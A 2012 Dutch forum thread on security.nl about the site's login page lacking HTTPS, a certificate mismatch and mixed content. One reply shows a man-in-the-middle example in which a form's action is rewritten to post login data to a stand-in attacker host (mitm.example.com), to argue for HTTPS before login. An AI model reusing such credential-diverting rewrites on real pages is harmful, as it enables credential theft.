Computerbeveiliging - Hoe je bad guys buiten de deur houdt

HTTPS en security.nl

19-03-2012, 10:47 door rbeumer, 8 reacties
Het was al een tijd geleden dat ik inlogde op security.nl. Daarbij viel het me op dat voor het inloggen in eerste instantie geen https wordt gebruikt, maar pas nadat er op inloggen wordt geklikt. Dat is niet altijd gelijk gevaarlijk, misschien wel iets om over na te denken.

Na het inloggen word je verwezen naar https://security.nl, wat een mooie fout geeft bij certificaatverificatie: het certificaat is niet uitgegeven voor security.nl maar voor secure.security.nl. Het lijkt me dan ook de bedoeling dat er een certificaat komt voor security.nl, of dat een juiste verwijzing naar secure.security.nl.

Nadat ik naar secure.security.nl ging, kwam er ook weer een melding dat er helaas bronnen op de pagina zitten die niet beveiligd zijn. Voor een screenshot: http://i.imgur.com/ohb0R.png

Helaas kon ik op het forum over dit onderwerp nog geen topics vinden, vandaar dat ik dan maar de vraag stel ;) Is https bij security.nl nog experimenteel o.i.d?
Reacties (8)
19-03-2012, 12:16 door SirDice
Door rbeumer: Het was al een tijd geleden dat ik inlogde op security.nl. Daarbij viel het me op dat voor het inloggen in eerste instantie geen https wordt gebruikt, maar pas nadat er op inloggen wordt geklikt.
De login gegevens worden over SSL gepost.


<form action="https://secure.security.nl/" method="post">
19-03-2012, 13:25 door rbeumer
Door SirDice:
Door rbeumer: Het was al een tijd geleden dat ik inlogde op security.nl. Daarbij viel het me op dat voor het inloggen in eerste instantie geen https wordt gebruikt, maar pas nadat er op inloggen wordt geklikt.
De login gegevens worden over SSL gepost.


<form action="https://secure.security.nl/" method="post">

Vreemd, ik werd niet naar secure.security.nl verwezen, maar gewoon security.nl
19-03-2012, 13:42 door SirDice
Door rbeumer:
Door SirDice:
Door rbeumer: Het was al een tijd geleden dat ik inlogde op security.nl. Daarbij viel het me op dat voor het inloggen in eerste instantie geen https wordt gebruikt, maar pas nadat er op inloggen wordt geklikt.
De login gegevens worden over SSL gepost.


<form action="https://secure.security.nl/" method="post">
Vreemd, ik werd niet naar secure.security.nl verwezen, maar gewoon security.nl
Dat maakt ook niet uit, het gaat om de login gegevens. Die worden evengoed over SSL gestuurd, ook al maak je geen SSL connectie met de site zelf.
19-03-2012, 14:03 door Anoniem
"Het was al een tijd geleden dat ik inlogde op security.nl. Daarbij viel het me op dat voor het inloggen in eerste instantie geen https wordt gebruikt, maar pas nadat er op inloggen wordt geklikt. Dat is niet altijd gelijk gevaarlijk, misschien wel iets om over na te denken."

Naast het feit dat de login gegevens via https gaan, zoals uitgelegd door SirDice, vraag ik me af waar je je druk om maakt. Welke gevoelige informatie over jou wordt op deze website opgeslagen ? Of vind je het gebruik van https op iedere website even relevant ?
19-03-2012, 16:33 door rbeumer
Het is een teken van slordigheid. Misschien niet direct schadelijk, maar wel erg slordig.
19-03-2012, 19:36 door Bitwiper
Door SirDice:
De login gegevens worden over SSL gepost.


<form action="https://secure.security.nl/" method="post">
Daar heb je geen fluit aan als een MITM aanvaller die regel code tussen www.security.nl en jouw webbrowser (ongemerkt voor jou) wijzigt in
<form action="https://mitm.example.com/" method="post">
of
<form action="http://mitm.example.com/" method="post">
Daarom is het essentieel dat je reeds een https verbinding hebt -met de juiste site- voordat een actie tot gevolg heeft dat gevoelige gegevens worden overgedragen.

Overigens is dit onderwerp al verschillende keren aan de orde geweest, zie bijv. https://secure.security.nl/artikel/39384/1/Security.nl_https_verbetering.html.
19-03-2012, 22:14 door root
En ter aanvulling op Bitwiper: de gebruiker moet eenvoudig kunnen zien dat zijn login gegevens veilig over het net worden getransporteerd, en dat is nu niet zo. Het kan beter dus.
19-03-2012, 22:42 door 0101
Die onveilige bronnen zijn advertenties. Met AdBlock+ heb ik er geen last van. Oh, en verder nog de afbeeldingen bij artikelen. Maar dat vangt HTTPS Everywhere af.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.

Zoeken
search